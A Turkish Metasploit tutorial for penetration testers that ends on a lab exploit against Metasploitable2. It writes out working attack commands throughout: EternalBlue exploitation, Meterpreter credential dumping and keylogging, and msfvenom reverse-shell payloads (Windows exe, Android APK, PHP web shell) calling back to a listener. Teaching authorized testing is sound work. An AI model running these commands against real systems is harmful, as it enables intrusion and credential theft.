Araç Rehberi • Exploit Çerçevesi
Metasploit, 2003'te HD Moore tarafından geliştirilen ve bugün Rapid7 tarafından yönetilen açık kaynaklı exploit çerçevesidir. 2000'den fazla exploit, yüzlerce payload ve otomatik post-exploitation modülüyle sektörün en kapsamlı sızma testi platformudur. Yalnızca izin verilen sistemlerde kullanılmalıdır.
1. Metasploit Mimarisi: Ne Neye Yarar?
ExploitHedef sistemdeki açığı tetikleyen kod
PayloadExploit sonrası çalışacak kod (shell, meterpreter)
AuxiliaryTarama, brute force, fuzzing modülleri
PostErişim sonrası veri toplama modülleri
EncoderPayload'ı şifreleyerek AV'dan kaçma
NopNOP slide için padding üreticileri
2. Temel msfconsole Komutları
msfconsole # Başlat
help # Komutları listele
search eternalblue # Exploit ara
use exploit/windows/smb/ms17_010_eternalblue # Seç
show options # Gerekli parametreler
set RHOSTS 192.168.1.100 # Hedef IP
set LHOST 192.168.1.50 # Dinleyici IP (sizin)
set PAYLOAD windows/x64/meterpreter/reverse_tcp # Payload
run # Çalıştır
sessions -l # Açık oturumlar
sessions -i 1 # 1. oturuma bağlan
3. Meterpreter: Post-Exploitation İsviçre Çakısı
Meterpreter, bellekte çalışan (disk yazısı bırakmayan), şifreli kanal üzerinden iletişim kuran gelişmiş payload'dır. Sistem üzerinde son derece geniş yetenekler sunar:
sysinfo # Sistem bilgisi (OS, hostname)
getuid # Mevcut kullanıcı
getsystem # Otomatik yetki yükseltme dener
hashdump # Windows şifre hash'lerini çek
screenshot # Ekran görüntüsü al
keyscan_start # Keylogger başlat
keyscan_dump # Kaydedilen tuşları al
upload /root/tool.exe C:\\Windows\\Temp # Dosya yükle
download C:\\Users\\target\\file.txt # Dosya indir
run post/multi/recon/local_exploit_suggester # LPE önerir
load kiwi # Mimikatz entegrasyonu
creds_all # Tüm kimlik bilgilerini çek
4. Lab Senaryosu: Metasploitable2'ye İlk Exploit
Metasploitable2 kasıtlı olarak zafiyetli yapılmış bir Linux imajıdır. VirtualBox'a kurup güvenle pratik yapabilirsiniz. Popüler hedef: vsftpd 2.3.4 backdoor.
# Nmap ile tespit
nmap -sV -p 21 192.168.1.200
# Sonuç: 21/tcp open ftp vsftpd 2.3.4
# Metasploit ile exploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.200
run
# [*] Command shell session 1 opened → Root shell!
id # uid=0(root) gid=0(root)
5. msfvenom: Özelleştirilmiş Payload Üretimi
# Windows reverse TCP payload (.exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
# Android APK payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o malicious.apk
# PHP web shell (web server'a yüklenir)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php